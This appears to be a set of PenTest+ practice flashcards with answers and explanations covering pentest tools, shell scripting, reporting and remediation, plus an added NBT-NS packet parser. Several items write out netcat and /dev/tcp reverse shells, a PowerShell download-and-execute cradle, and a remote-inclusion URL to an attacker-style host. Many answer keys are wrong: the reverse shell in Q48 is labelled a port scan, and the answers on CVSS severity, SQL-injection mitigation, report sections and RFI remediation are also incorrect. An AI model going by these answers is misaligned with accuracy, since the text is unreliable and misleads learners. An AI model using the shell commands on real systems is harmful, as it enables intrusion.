You are a penetration tester, and you are conducting a test for a new client. You want to deploy a malicious website as part of the test to exploit the browsers belonging to the client’s employees. What tool can the test utilize?

A.Browser Exploitation Framework (BeEF)
B.Metasploit
C.Open Web Application Security Project (OWASP)
D.Social Engineer Toolkit (SET)

A

A.Browser Exploitation Framework (BeEF)

Explanation:
The Browser Exploitation Framework (BeEF) is designed for this type of attack. BeEF provides an automated toolkit for using social engineering to take over a client’s web browser. You can then use various phishing and social engineering techniques to get employees to visit the site.

34
Q

You are a penetration tester, and you are conducting a test for a new client. You are planning to create a custom wordlist of common words and catchphrases about your client using the client’s website. What is the name of the tool that you can utilize to assist with building a custom wordlist?

A.CeWL
B.Hashcat
C.Hydra
D.Medusa

A

A.CeWL

Explanation:
The Custom Word List (CeWL) generator is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization’s websites can help generate a custom wordlist. Building a custom wordlist can be particularly useful if you have gathered a lot of information about your target organization.

35
Q

You are a penetration tester, and you are conducting a test for a new client. During the internal penetration test, several multicast and broadcast name resolution requests are observed moving through the network. You want to impersonate network resources and collect authentication requests. What tool should you use?

A.Ettercap
B.Medusa
C.Tcpdump
D.Responder

A

D.Responder

Explanation:
In this scenario, the question specifically states “name resolution requests.” In this case, Responder is the best choice. Responder is a toolkit used to answer NetBIOS queries from Windows systems on a network. Tcpdump is a type of packet analyzer software utility that monitors and logs TCP/IP traffic passing between a network and the computer on which it is executed. Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. Medusa is a brute-force login attack tool that supports a variety of protocols and services.
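Added example, not from the Sybex text or from Responder's code: a Python encoder, builder, and parser for the NBT-NS name query packets that Responder answers (RFC 1001/1002 first-level name encoding, carried over UDP port 137), plus an is_poisonable() check that picks out the broadcast queries a rogue responder can answer. The host name FILESRV01, the transaction ID, and the packet bytes are constructed for the example; the code decodes and classifies traffic but does not send responses.

```python
import struct

NBNS_PORT = 137
QTYPE_NB = 0x0020          # general NetBIOS name query
QTYPE_NBSTAT = 0x0021      # node status request
FLAG_RESPONSE = 0x8000     # R bit: set on responses
FLAG_RD = 0x0100           # recursion desired
FLAG_BROADCAST = 0x0010    # B bit: query was broadcast

# Common NetBIOS suffix bytes (16th byte of the name) and the role they denote.
SUFFIXES = {0x00: "workstation", 0x03: "messenger", 0x1B: "domain master browser",
            0x1C: "domain controllers", 0x1D: "master browser", 0x20: "file server"}


def encode_nbt_name(name: str, suffix: int = 0x20) -> bytes:
    """First-level encoding (RFC 1001 14.1): pad the name to 15 bytes, append
    the suffix byte, then write each nibble as 'A' + nibble (32 letters A..P)."""
    raw = name.upper().encode("ascii")
    if len(raw) > 15:
        raise ValueError("NetBIOS names are at most 15 characters")
    raw = raw.ljust(15, b" ") + bytes([suffix & 0xFF])
    return bytes(b for byte in raw for b in (0x41 + (byte >> 4), 0x41 + (byte & 0x0F)))


def decode_nbt_name(encoded: bytes):
    """Reverse of encode_nbt_name; returns (name, suffix)."""
    if len(encoded) != 32 or any(not 0x41 <= c <= 0x50 for c in encoded):
        raise ValueError("not a first-level encoded NetBIOS name")
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].rstrip(b" ").decode("ascii"), raw[15]


def build_nbt_query(name: str, suffix: int = 0x20, trn_id: int = 0x1234) -> bytes:
    """Build the broadcast NAME QUERY REQUEST a Windows host sends to UDP 137."""
    header = struct.pack(">HHHHHH", trn_id, FLAG_RD | FLAG_BROADCAST, 1, 0, 0, 0)
    question = b"\x20" + encode_nbt_name(name, suffix) + b"\x00"   # one 32-byte label, no scope
    return header + question + struct.pack(">HH", QTYPE_NB, 0x0001)


def parse_nbt_query(packet: bytes) -> dict:
    """Parse the header and first question of an NBT-NS packet."""
    if len(packet) < 12:
        raise ValueError("short NBT-NS header")
    trn_id, flags, qdcount, ancount, _, _ = struct.unpack(">HHHHHH", packet[:12])
    if qdcount < 1:
        raise ValueError("no question section")
    off = 12
    if packet[off] != 0x20:
        raise ValueError("expected a 32-byte encoded label")
    encoded = packet[off + 1:off + 33]
    off += 33
    while packet[off] != 0:           # skip any scope labels
        off += 1 + packet[off]
    off += 1
    qtype, qclass = struct.unpack(">HH", packet[off:off + 4])
    name, suffix = decode_nbt_name(encoded)
    return {"trn_id": trn_id, "is_response": bool(flags & FLAG_RESPONSE),
            "is_broadcast": bool(flags & FLAG_BROADCAST), "opcode": (flags >> 11) & 0x0F,
            "name": name, "suffix": suffix, "role": SUFFIXES.get(suffix, "other"),
            "qtype": qtype, "qclass": qclass, "ancount": ancount}


def is_poisonable(q: dict) -> bool:
    """A broadcast, non-response NB name query is one a rogue responder can answer."""
    return q["is_broadcast"] and not q["is_response"] and q["qtype"] == QTYPE_NB and q["opcode"] == 0


if __name__ == "__main__":
    pkt = build_nbt_query("FILESRV01", 0x20, trn_id=0xBEEF)   # constructed sample query
    q = parse_nbt_query(pkt)
    print(q, "poisonable:", is_poisonable(q))
```

Run parse_nbt_query() over the UDP payloads of port-137 broadcasts from a capture to see which names hosts are asking for; a steady stream of poisonable queries for names that do not exist (typos, stale shares, WPAD) is what makes Responder effective on a network, and the fix is to disable NBT-NS and LLMNR on the clients.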

36
Q

You are a penetration tester, and you are conducting a test for a new client. You want to do a search to see your client’s computers and devices that are connected to the Internet. You want to be able to use a variety of filters. What tool can you use to accomplish this?

A.Censys
B.Shodan
C.TheHarvester
D.Whois

A

B.Shodan

Explanation:
Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes.

37
Q

You are a penetration tester, and you are conducting a test for a new client. You want to do a search to see whether your client’s computers and devices are connected to the Internet and to see whether their geoIP information is available. What tool can you use to accomplish this?

A.Censys
B.Shodan
C.TheHarvester
D.Whois

A

A.Censys

Explanation:
Much like Shodan, Censys is a security-oriented search engine. When you dig into a host in Censys, you will also discover geoIP information, if it is available, and a comprehensive summary of the services the host exposes, providing more detailed information. GeoIP refers to the method of locating a computer terminal’s geographic location by identifying that terminal’s IP address.

38
Q

You are a penetration tester, and you are conducting a test for a new client. You are conducting a test on a specific client database server. You want to detect any vulnerabilities on this server. What tool will best assist you?

A.Nessus
B.Nikto
C.Sqlmap
D.OpenVAS

A

C.Sqlmap

Explanation:
Sqlmap is an open source tool used to automate SQL injection attacks against web applications with database back-ends. Sqlmap is a commonly used open source database vulnerability scanner that allows security administrators to probe web applications for database vulnerabilities. For this scenario, Sqlmap is a dedicated database vulnerability scanner and is the most appropriate tool.

39
Q

You are a penetration tester, and you are conducting a test for a new client. During the gray box penetration test you want to be able to set up a reverse shell exploit where the compromised system on the target network “calls home” to a listener set up on your laptop and to allow you to remotely control the compromised system. What remote access tool could you use?

A.Wireshark
B.Impacket
C.Netcat
D.Responder

A

C.Netcat

Explanation:
Netcat is an open source network debugging and exploration utility that can read and write data across network connections, using the TCP/IP protocol.

Netcat is also a popular remote access tool, and it has a small footprint that makes it easily portable to many systems during a penetration test.

Setting up a reverse shell with netcat on Linux looks like this:

nc [IP of remote system] [port] -e /bin/sh

Setting up a reverse shell with netcat on Windows looks like this:

nc [IP of remote system] [port] -e cmd.exe

It is also fairly easy to set up netcat as a listener by using this:

nc -l -p [port]

40
Q

You are a penetration tester, and you are conducting a test for a new client. During a gray box penetration test you want to be able to set up a bind shell exploit where a listener is set up on a compromised system on the client’s network. Which remote access tools can you use to do this? (Choose two.)

A.Empire
B.Ncat
C.Netcat
D.Powersploit
E.Searchsploit

A

B.Ncat
C.Netcat

Explanation:

Netcat is an open source network debugging and exploration utility that can read and write data across network connections, using the TCP/IP protocol. Netcat is also a popular remote access tool, and it has a small footprint that makes it easily portable to many systems during a penetration test.

Setting up a reverse shell with netcat on Linux looks like this:

nc [IP of remote system] [port] -e /bin/sh

Setting up a reverse shell with netcat on Windows looks like this:

nc [IP of remote system] [port] -e cmd.exe

It is also fairly easy to set up netcat as a listener by using this:

nc -l -p [port]

Ncat is designed as a successor to Netcat and has the same functionality plus a variety of additional capabilities, including SSL, proxies, and tricks such as sending email or chaining Ncat sessions together to allow pivoting.

41
Q

You are a penetration tester, and you are conducting a test for a new client. During a gray box penetration test, you want to poison queries for the client’s domain controller to redirect client requests to your laptop and to capture usernames and hashed passwords. What tool could you use?

A.Empire
B.Impacket
C.Responder
D.Searchsploit

A

C.Responder

Explanation:
Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services, pretending to be the system that the query is intended for. Responder exploits the trust in a service response to tell the client that the responder host is a legitimate service provider, causing it to send its hashed credentials, which the owner of the Responder host can then use to authenticate to legitimate servers.

42
Q

You are a penetration tester, and you are conducting a test for a new client. You are writing the following Python code:

if 1 == 1:
    print("howdy")
elif 3 == 3:
    print("howdy")
else:
    print("howdy")

How many times will this code print the word howdy?

A.0
B.1
C.2
D.3

A

B.1

Explanation:
In this scenario, you are using conditional execution, so only one clause is executed. In this case, the code following the if clause will execute, making it impossible for the elif or else clause to execute. Conditional execution allows developers to write code that executes only when certain logical conditions are met. The most common conditional execution structure is the if...then...else statement.

43
Q

You are a penetration tester, and you are conducting a test for a new client. You are analyzing a script to determine why the script is not returning the correct results as expected. The expected results should be True.

root:~# cat ./myscript.sh
#!/bin/bash
source=10
let dest=5+5
if [ 'source' = 'dest' ]; then
    echo "True"
else
    echo "False"
fi
#End of File
root:~# ./myscript.sh
False

By reviewing the script, how should you correct the errors to return the correct results? (Choose two.)

A.Change "fi" to "EndIf".
B.Remove "let" in front of dest=5+5.
C.Change "=" to "-eq".
D.Change "'source'" and "'dest'" to "'$source'" and "'$dest'".
E.Change "else" to "elif".

A

B.Remove “let” in front of dest=5+5.
C.Change “=” to “-eq”.

Explanation:
Given this scenario, the word let does not need to be included in the script, so it can be removed, and in Bash, the equivalent to = is -eq, which is the arithmetic binary operator. Once these modifications are made, the script will work as expected.

44
Q

You are a penetration tester, and you are conducting a test for a new client. You want to create an array by using a PowerShell script. Which line of code would you use?

A.$ports = 20, 25, 80, 443
B.ports = (20,25,80,443)
C.ports = [20,25,80,443]
D.$ports= [20,25,80,443]

A

A.$ports = 20, 25, 80, 443

Explanation:
PowerShell requires the use of the $ before an array name in an assignment operation. The elements of the array are then provided as a comma-separated list. Option B would work in Bash, option C would work in Ruby or Python, and option D does not follow the correct syntax for a PowerShell command. PowerShell is much simpler in the way that you declare and use variables. You just need to remember to precede the variable name with a $, whether it’s for setting, changing, or retrieving the value stored in that variable.

45
Q

You are a penetration tester, and you are conducting a test for a new client. You intend to run the following command on your client’s system:

bash -i >& /dev/tcp/10.2.4.6/443 0>&1

What additional command would need to be executed on your Linux system to make the previous command work?

A.nc -nvlp 443
B.nc 10.2.4.6 443
C.nc -w3 10.2.4.6 443
D.nc-/bin/ah 10.2.4.6 443

A

A.nc -nvlp 443

Explanation:
You will want to create a Netcat listener that waits for the inbound shell from the target machine. To get a shell, Netcat uses nc -nvlp 443 to listen for incoming connections. Using this syntax, you are telling Netcat (nc) not to resolve names (-n), to be verbose, printing a message when a connection occurs (-v), and to listen (-l) on a given local port (-p).

46
Q

You are a penetration tester, and you are conducting a test for a new client. You are using PowerShell to conduct a test. You are using the following PowerShell command:

powershell.exe IEX (New-Object Net.Webclient).downloadstring("http://site/script.ps1");Invoke-Command

What action is being performed by this command?

A.It executes a remote script.
B.It incorporates an object.
C.It runs an encoded command.
D.It sets the execution policy.

A

A.It executes a remote script.

Explanation:
In this scenario, the PowerShell command given executes a remote script. IEX invokes an expression: it evaluates or runs a specified string as a command and returns the results of the expression or command. The PowerShell Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. By using a single Invoke-Command command, you can run commands on multiple computers.

47
Q

You are a penetration tester, and you are conducting a test for a new client. You gain access into an unrestricted system network by using port 443. You want to create a reverse shell from the client back to your computer. Which method will you most likely use?

A.bash -i >& /dev/tcp//443 0>&1
B.nc -e /bin/sh 443
C.perl -e ‘use SOCKET’; $i=’; $p=’443;
D.ssh superadmin@ -p 443

A

A.bash -i >& /dev/tcp//443 0>&1

Explanation:
A reverse shell opens a communication channel on a port and waits for incoming connections. The client’s machine acts as a server and initiates a connection to the tester’s machine. This is what is done by using the following:

bash -i >& /dev/tcp//443 0>&1

Given the options, option A is the best option. Options B and C will not work because they are using the and not the , and option D is not correct because it is using the improper syntax.

48
Q

You are a penetration tester, and you are conducting a test for a new client. During a penetration test, the following line of code was found in an exploited machine’s history file:

/bin/bash -i >& /dev/tcp/192.168.0.10/80 0>&1

What best describes what this command line does?

A.A port scan has been performed.
B.It obtains the web server’s banner.
C.It redirects a teletypewriter (TTY) to a remote system.
D.It removes the error logs for the given IP.

A

A.A port scan has been performed.

Explanation:
In the Bash shell, a network socket can be opened to pass data through it. A TCP socket can be opened using /dev/tcp//. Bash is attempting to open a TCP connection to the corresponding socket. So, in this example, a port scan has been performed. Here’s a breakdown of the code: /bin/bash -i: Invokes an interactive Bash shell. > &/dev/tcp//: Pipes that shell to the tester. 0&1: Takes standard input and connects it to standard output. It does the same with standard error (2>).

49
Q

You are a penetration tester, and you are completing the test for a new client. Once the testing is done, you are prioritizing the findings and recommendations for an executive summary. Which one of the following considerations would be the most beneficial to your client?

A.The availability of patches and other remediations
B.The levels of difficulty to exploit the identified vulnerabilities
C.The risk tolerance of the client’s organization
D.The time it took to accomplish each step

A

C.The risk tolerance of the client’s organization

Explanation:
In this scenario, it would be important to put the risk tolerance of the client’s organization into the executive summary. Risk tolerance is basically how much risk an organization is willing to take on where their investments are concerned. With any type of investment, there is always risk, but how much risk one is able to withstand is their risk tolerance. This may be different for every organization. You cannot put a set value on risk tolerance.

50
Q

You are a security analyst, and you have just completed a penetration test for a new client. You are writing up the executive summary. What item would not be appropriate when writing an executive summary?

A.You should include a description of all your findings and vulnerabilities.
B.You should include a statement of risk for all found vulnerabilities.
C.You should make sure it’s written in plain language.
D.You should include all the technical details pertaining to the testing.

A

D.You should include all the technical details pertaining to the testing.

Explanation:
An executive summary should not contain technical detail. The executive summary is the most important section of the report. It should be written in a manner that conveys all the important conclusions of the report in a clear manner that is written in “layman’s terms.” You should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

51
Q

You are a penetration tester, and you have just completed testing for a new client. A detailed penetration report was given to the security analyst. The penetration was conducted against the client’s DMZ environment. The report had a finding that the Common Vulnerability Scoring System (CVSS) had a base score of 1.0. To exploit this vulnerability, which level of difficulty would be required?

A.Very difficult, because the perimeter systems are usually behind a firewall
B.Somewhat difficult, because it would require powerful processing power to exploit
C.Trivial, because little effort would be required to exploit the findings
D.Impossible, because the external hosts are hardened to protect against attacks

A

C.Trivial, because little effort would be required to exploit the findings

Explanation:
The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities. It provides a technique for scoring each vulnerability on a variety of measures. Security analysts often use CVSS ratings to prioritize response actions. Each measure is given a descriptive rating and a numeric score.

52
Q

You are a penetration tester, and you are planning a test for a new client. You are writing a report that outlines the overall level of risk to operations. In which part of the report should you include this information?

A.Appendices
B.Executive summary
C.Main body
D.Technical summary

A

B.Executive summary

Explanation:
In this scenario, the question states that the penetration tester is writing a report “that outlines the overall level of risk.” Given this statement, the tester will be including this information in the executive summary. The executive summary is the most important section of the report. It should be written in a manner that conveys all the important conclusions of the report in a clear manner that is written in “layman’s terms.” A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

53
Q

You are a security analyst, and you are reviewing the results of a recent internal vulnerability scan that was performed against intranet services. The scan reports indicated that there was a critical vulnerability. The report indicated the following:

Title: Remote Command Execution vulnerability in web server

Rating: Critical (CVSS 10.0) Threat actor: any remote user of the web server

Confidence: certain

Recommendation: apply vendor patches

What should you do first?

A.Apply a risk rating and how it affects the organization.
B.Exploit the server to determine whether the scan indicated a false positive.
C.Inform senior management regarding the vulnerability.
D.Organize for critical out-of-cycle patching.

A

A.Apply a risk rating and how it affects the organization.

Explanation:
In this scenario, it asks what the security analyst should do first. Once the vulnerability has been identified, you need to rate the risk and how it affects your organization. The rating will determine whether it is safe enough to continue with the work or whether you need to adopt additional control measures to reduce or eliminate the risk. The rating depends upon the likelihood of an event occurring and the severity of the vulnerabilities. The Common Vulnerability Scoring System (CVSS) is a framework for rating the severity of security vulnerabilities. The CVSS uses an algorithm to determine three severity rating scores: Base, Temporal, and Environmental. The scores are numeric and range from 0.0 to 10.0. The most severe is 10.0. According to CVSS, a score of 0.0 receives a None rating, a 0.1–3.9 score gets a Low severity rating, a score of 4.0–6.9 is a Medium rating, a score of 7.0–8.9 is a High rating, and a score of 9.0–10.0 is a Critical rating. In this scenario, the score is 10.0 and falls within the Critical category.

54
Q

You are a penetration tester, and you have just completed testing for a new client. You are creating a written report of your findings after the testing. In what section of the report should you provide the reader with an in-depth outline of the testing performed and the results found?

A.In the Executive Summary section
B.In the Findings and Remediation section
C.In the Methodology section
D.In the Metrics and Measures section

A

A.In the Executive Summary section

Explanation:
The executive summary is the most important section of the report. Most times, it is the only section that many individuals will read, so it should be written in a manner that conveys all the important conclusions of the report in “layman’s terms,” in other words, in a clear manner that is understandable to everyone. The executive summary serves as a high-level view of both risk and business impact in plain English. Its purpose is to be concise and clear. It should be nontechnical so readers can review and gain insight into the security concerns that are highlighted in the report.

55
Q

You are a penetration tester, and you have just completed testing for a new client. You are creating a written report of your findings after the testing. Based on the results of your testing, you have come up with a list of recommendations you think the client should focus on. In what section of the report should you put these recommendations?

A.In the Conclusion section
B.In the Executive Summary section
C.In the Findings and Remediation section
D.In the Methodology section

A

A.In the Conclusion section

Explanation:
The conclusion is your opportunity to summarize your report and to make recommendations. The conclusion is the final overview of the test. It should end on a positive note giving the client support and guidance.

56
Q

You are a penetration tester, and you have just completed testing for a new client. You are conducting a post-engagement cleanup. What activities are performed during the post-engagement cleanup phase? (Choose three.)

A.Remediating vulnerabilities
B.Removing any tools used
C.Removing shells
D.Removing the tester-created credentials

A

B.Removing any tools used
C.Removing shells
D.Removing the tester-created credentials

Explanation:
CompTIA highlights three important post-engagement cleanup activities:

Removing any shells installed on systems during the penetration test

Removing any tester-created accounts, credentials, or backdoors that were installed during testing

Removing any tools that were installed during testing

Remediation of vulnerabilities is a follow-on activity and is not conducted as part of the test. The testers should remove any shells or other tools installed during testing as well as remove any accounts or credentials that they created.

57
Q

You are a penetration tester, and you have just completed testing for a new client. While doing a cleanup after the test it is discovered that the client does not have the necessary data wiping tools. The tools needed were then distributed to the technicians who needed them. During what phase should you revisit this issue?

A.During the lessons learned phase
B.During the mitigation phase
C.During the preparation phase
D.During the reporting phase

A

A.During the lessons learned phase

Explanation:
In this scenario, it would be best to revisit this situation during the lessons learned phase. The lessons learned session is the team’s opportunity to get together and discuss the testing process and results without the client present. Team members should freely discuss the test and offer suggestions for improvement. The lessons learned session is a good opportunity to highlight any innovative techniques used during the test that might be used in future engagements.

58
Q

You are a penetration tester, and you are conducting a test for a new client. You have just about completed the testing, and you want to make sure that the post-engagement cleanup process has no issues. What should you do throughout the testing phase to make sure that the post-engagement goes effortlessly?

A.You should create backdoors so you can access them later.
B.You should carefully record everything you’ve done during the testing.
C.You should erase any log entries that you created during your exploitation.
D.You should create images of all systems and devices so you can restore them to their pre-test state.

A

B.You should carefully record everything you’ve done during the testing.

Explanation:
After a penetration test, it is imperative that you undo everything you have done to your client’s network. The best way to do this is by carefully documenting everything you’ve done while conducting the testing. That way, you don’t accidentally forget something.

59
Q

You are a penetration tester, and you have just completed testing for a new client. You are conducting the post-engagement cleanup process. What should you do during the post-engagement cleanup process? (Choose two.)

A.You want to make sure to remove any shell sessions that you created during the testing.
B.You want to make sure to hide everything you did during the testing from the client.
C.You want to make sure to document everything you did during the testing.
D.You want to hide everything you did during the clean up after the testing.

A

A.You want to make sure to remove any shell sessions that you created during the testing.
C.You want to make sure to document everything you did during the testing.

Explanation:
After a penetration test, it is imperative that you undo everything you have done to your client’s network. So, if you have created any shells, they need to be removed. It is also important to document everything you’ve done while conducting the testing. That way, you don’t accidentally forget something. The goal is to put everything the way it was prior to your testing.

60
Q

You are a penetration tester, and you have just completed testing for a new client. You are meeting with your client to discuss the penetration test. At the end of the meeting, you ask your client to sign an agreement stating that you have fulfilled your responsibilities according to your contract. What is this called?

A.Attestation of findings
B.Client acceptance
C.Follow-up actions/retest
D.Lessons learned

A

B.Client acceptance

Explanation:
You should obtain client acceptance upon the completion of your services. This may include a written acknowledgment of your final report. Most times, this includes a face-to-face meeting where you can discuss the results of the engagement with your client and answer any questions they might have. Client acceptance marks the end of the engagement and is the formal agreement that the tester has completed the scope of work.

61
Q

You are a penetration tester, and you have just completed testing for a new client. You are meeting with your client to discuss the penetration test. During this meeting, you provide the client with a document stating that you have conducted testing and that the client is in compliance with the rules and regulations set forth by one of the client’s government contracts. What is this called?

A.Attestation of findings
B.Client acceptance
C.Follow-up actions/retest
D.Lessons learned

A

A.Attestation of findings

Explanation:
An attestation of findings is a document provided by the penetration testers to document that they conducted a test and the results for compliance purposes. It serves as record of the tester performing the penetration test. It includes a summary of the findings. Its intent is for external use, outside of your client’s organization, to show proof that a penetration test was performed and to highlight the test results.

62
Q

A junior technician in an organization’s IT department runs a penetration test on a corporate web application. During testing the technician discovers that the application can disclose a SQL table that has all the corporate user account and password information. How should the junior technician notify upper management?

A.The technician should connect to the SQL server using this information and change the passwords of a few noncritical accounts to demonstrate a proof of concept to management.
B.The technician should document the findings using an executive summary including recommendations and screenshots to provide to management.
C.The technician should notify the development team of the discovery and suggest that input validation be enforced on the web application’s SQL query strings.
D.The technician should request that management create a request for proposal (RFP) to begin a formal engagement with a professional penetration testing company.

A

D.The technician should request that management create a request for proposal (RFP) to begin a formal engagement with a professional penetration testing company.

Explanation:
In this scenario, since the testing was performed by an on-staff junior administrator, it may be in the company’s best interest to create a request for proposal (RFP) for a professional penetration testing company to corroborate the assessment and report any vulnerability findings to the company. An RFP is a document that solicits proposals, often through a bidding process.

63
Q

You and a colleague are discussing a scenario of an organization implementing email content filtering to block inbound messages that appear to come from internal sources without proper authentication. They also might filter out any messages that contain high-risk keywords or appear to be coming from known malicious sources. What common category of remediation activity would this fall under?

A.Measurement
B.People
C.Process
D.Technology

A

D.Technology

Explanation:
In this scenario, you are discussing technology. Technological controls also provide effective defenses against many security threats. There are three major categories of remediation activities. The categories are people, process, and technology.

64
Q

You and a colleague are discussing multifactor authentication. Your colleague asks you for an example of what multifactor authentication is. What do you tell your colleague?

A.That multifactor authentication is using biometric fingerprints and voice recognition
B.That multifactor authentication is using smart cards and PINs
C.That multifactor authentication is using retina scans and voice recognition
D.That multifactor authentication is using usernames, PINs, and employee ID numbers

A

B.That multifactor authentication is using smart cards and PINs

Explanation:
In this scenario, the best option to tell your colleague is that multifactor authentication is using smart cards and PINs. Multifactor authentication (MFA) is a security system that requires more than one method of authentication from separate categories of credentials to verify the user’s identity for a login or other transaction. The authentication categories are something you know, something you have, and something you are.

65
Q

You and a colleague are discussing the different multifactor authentication categories. One example may be that an employee is using a key fob that has authentication tokens that generate a one-time password that must be used at login. What multifactor authentication category would this scenario fall under?

A.Something you are
B.Something you have
C.Something you know
D.Something you need

A

B.Something you have

Explanation:
In this scenario, you and your colleague are discussing something you have. Physical objects may be used as authentication mechanisms. Organizations seeking to protect sensitive information and critical resources should implement multifactor authentication. Multifactor authentication implementations combine two or more authentication mechanisms coming from different authentication categories. The authentication categories are something you know, something you have, and something you are.

66
Q

You are a penetration tester, and you are conducting a test for a new client. You notice that there are several high-numbered ports listening in on a public web server. The client indicates that they are only using port 443 for an application. What should you recommend to the client?

A.That they disable the unneeded services
B.That they filter port 443 to specific IP addresses
C.That they implement a web application firewall
D.That they transition the application to another port

A

A.That they disable the unneeded services

Explanation:
In this scenario, there are several high-numbered ports listening on a public web server. The best recommendation would be to disable unneeded services since the client uses only port 443. The unnecessary services can pose a security risk because they increase the attack surface, providing a potential attacker with additional ways to try to exploit the system.

67
Q

You are a penetration tester, and you are conducting a test for a new client. You were able to enter a SQL injection command into a text box and gain access to the information stored on the database. What should you recommend to the client to mitigate the vulnerability?

A.That they implement input normalization
B.That they install host-based intrusion detection
C.That they perform system hardening
D.That they randomize the credentials used to log in

A

C.That they perform system hardening

Explanation:
System hardening, also known as operating system hardening, helps minimize security vulnerabilities. The purpose of system hardening is to get rid of as many security risks as possible. This is usually done by removing all nonessential software programs and utilities from the computer. The goal of systems hardening by removing unused programs, accounts, functions, applications, ports, permissions, access, etc., is that attackers have fewer opportunities to gain access to your network. There are several types of system hardening activities. They include the following:

Application hardening

Operating system hardening

Server hardening

Database hardening

Network hardening

68
Q

You are a penetration tester, and you are conducting a test for a new client. The client has asked you to test the security of several web servers. You are able to gain access to the root/administrator on several of the servers by exploiting vulnerabilities related to the use of DNS, FTP, IMAP, POP, SMTP, and Telnet. What should you recommend to your client regarding how to better protect their web servers?

A.They should disable any unnecessary services.
B.They should increase application event logging.
C.They should use a honeypot.
D.They should use Transport Layer Security (TLS).

A

A.They should disable any unnecessary services.

Explanation:
The best recommendation would be to disable any unneeded services. Unnecessary services can pose a security risk because they increase your client’s network attack surface, providing a potential attacker with a number of ways to try to exploit the system. An attack surface is the total sum of the vulnerabilities in a given computing device or network that are accessible to a potential hacker.

69
Q

You are a penetration tester, and you have just completed testing for a new client. You are reviewing the results. You notice that the client uses the same local administrator password on all their systems. What tool can you use to help resolve this issue?

A.Local Administrator Password Solution (LAPS)
B.Limited Administrator Password Assistance (LAPA)
C.Nessus
D.Metasploit

A

A.Local Administrator Password Solution (LAPS)

Explanation:
Local Administrator Password Solution (LAPS) is a Microsoft tool that manages administrative credentials. It is for randomizing local administrator account credentials using Active Directory. Limited Administrator Password Assistance (LAPA) does not exist. Nessus is a vulnerability scanner, and Metasploit is an exploitation framework used to execute and attack networks.

70
Q

You are a penetration tester, and you are conducting a test for a new client. During testing, you were able to compromise a single workstation. Upon doing so, you were able to maneuver laterally throughout the domain with very few roadblocks. Which mitigation strategies should you recommend in your report to the client? (Choose three.)

A.That they apply additional network access control
B.That for all logons, they require multifactor authentication
C.That for each machine, they randomize local administrator credentials
D.That for local administrators, they disable remote logons
E.That they increase the minimum password complexity requirements
F.That they put each host into its own virtual local area network (VLAN)
G.That on every workstation, they enable full-disk encryption

A

B.That for all logons, they require multifactor authentication
E.That they increase the minimum password complexity requirements
G.That on every workstation, they enable full-disk encryption

Explanation:

In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be as follows:

Use multifactor authentication: Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism.

Increase minimum password complexity: Complex passwords use different types of characters in unique ways to increase security, making it harder for an attacker to crack.

Enable full-disk encryption: Full-disk encryption (FDE) is encryption at the hardware level. FDE works by automatically converting data on a hard drive into a form that cannot be understood by anyone who doesn’t have the key to “undo” the conversion.

71
Q

You are a penetration tester, and you are conducting a test for a new client. You are monitoring the Web Application Firewall (WAF) logs and discover that there was a successful attack against the following URL:

https://sample.com/index.php?Phone=http://iattackedyou.com/stuffhappens/revshell.php

What remediation steps should be taken to prevent this type of attack from happening again?

A.Block URL redirections.
B.Double URL encode the parameters.
C.From the application, stop external calls.
D.Implement a blacklist.

A

A.Block URL redirections.

Explanation:
In this scenario, the attacker was using a redirect. The security analyst should block URL redirections. A URL redirect is a web server function that sends a user from one URL to another. Redirects commonly take the form of an automated redirect that uses one of a series of status codes defined within the HTTP protocol. So, when a web browser attempts to open a URL that has been redirected, a page with a different URL is opened.

72
Q

You are a penetration tester, and you are conducting a test for a new client. While attempting phishing, you were able to retrieve the initial VPN user domain credentials from a member of the IT department. Then you obtained hashes over the VPN and effortlessly cracked them by using a dictionary attack. What remediation steps should you recommend to the client? (Choose three.)

A.Recommend increased password complexity requirements.
B.Recommend implementing two-factor authentication for remote access.
C.Recommend installing an intrusion prevention system.
D.Recommend installing a security information event monitoring solution.
E.Recommend preventing members of the IT department from interactively logging in as administrators.
F.Recommend requiring that all employees take security awareness training.
G.Recommend upgrading the cipher suite used for the VPN solution.

A

A.Recommend increased password complexity requirements.
F.Recommend requiring that all employees take security awareness training.
G.Recommend upgrading the cipher suite used for the VPN solution.

Explanation:
In this scenario, the tester should recommend that the client increase their password complexity requirements since the tester was able to crack them by using a dictionary attack. The tester should also recommend that all employees take security awareness training, since it was a member of the IT department who gave up pertinent information when
the tester used a phishing technique. The tester should also recommend upgrading the cipher suite that is used for the VPN solution. A cipher suite is a set of algorithms that help secure network connections that use Transport Layer Security (TLS) or Secure Socket Layer (SSL). The algorithms that cipher suites usually contain include a key exchange algorithm, a bulk encryption algorithm, and a message authentication code (MAC) algorithm.

73
Q

You are a penetration tester, and you are conducting a test for a new client. Upon completing testing on an Internet-facing application, you notice that the application is using only basic authentication. What is the best remediation strategy that you should recommend to the client?

A.That they enable HTTP Strict Transport Security (HSTS)
B.That they enable a secure cookie flag
C.That they encrypt the communication channel
D.That they sanitize invalid user input

A

A.That they enable HTTP Strict Transport Security (HSTS)

Explanation:
In this scenario, the tester should recommend that the client enable HTTP Strict Transport Security (HSTS). An HSTS response header lets a website tell browsers that it should be accessed using only HTTPS, instead of using HTTP. It is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS.

74
Q

